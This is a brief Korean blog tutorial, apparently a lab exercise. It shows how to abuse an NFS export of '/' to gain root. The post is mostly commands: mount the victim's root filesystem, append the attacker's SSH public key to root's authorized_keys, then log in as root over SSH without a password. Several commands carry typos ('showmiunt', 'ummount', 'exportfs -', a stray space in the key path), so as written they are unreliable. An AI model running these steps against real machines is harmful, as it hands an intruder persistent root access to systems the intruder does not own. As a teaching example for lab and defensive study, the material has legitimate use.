콘텐츠로 건너뛰기

[Hacking][Kali Linux] NFS 취약점 공격

답글 남기기

■ NFS 개념

  • 컴퓨터 사용자의 원격지 컴퓨터에 있는 파일을 자신의 컴퓨터를 사용하는 것처럼 설정 가능하게 해주는 클라이언트/서버형 응용프로그램


■ NFS 취약점 공격

  • nfs-utils 설치
# yum install -y nfs-utils

  • “/” Directory NFS 설정
# vim /etc/exports
# exportfs -
# exportfs

  • showmount 설치
# apt-get install -y nfs-common

  • IP 정보 출력
# showmiunt -e "ip"

  • NFS Directory Mount 작업
# mount -t nfs "ip":/ /"target dir"
# ls /"target dir"

  • ssh-keygen 생성
# ssh-keygen

  • 생성된 SSH Keygen -> root SSH 키 파일 추가
# cat .ssh/id_rsa.pub >> /"target dir"/root/ .ssh/authorized_keys
# ummount /"target dir"

  • SSH 접속 확인
# ssh root@"target IP"

쉘 접속 결과 HACKER 가 갖는 KEYGEN에 VICTIM KEYGEN 파일에 추가되어 비밀번호 없이 쉘 접속이 가능해진다.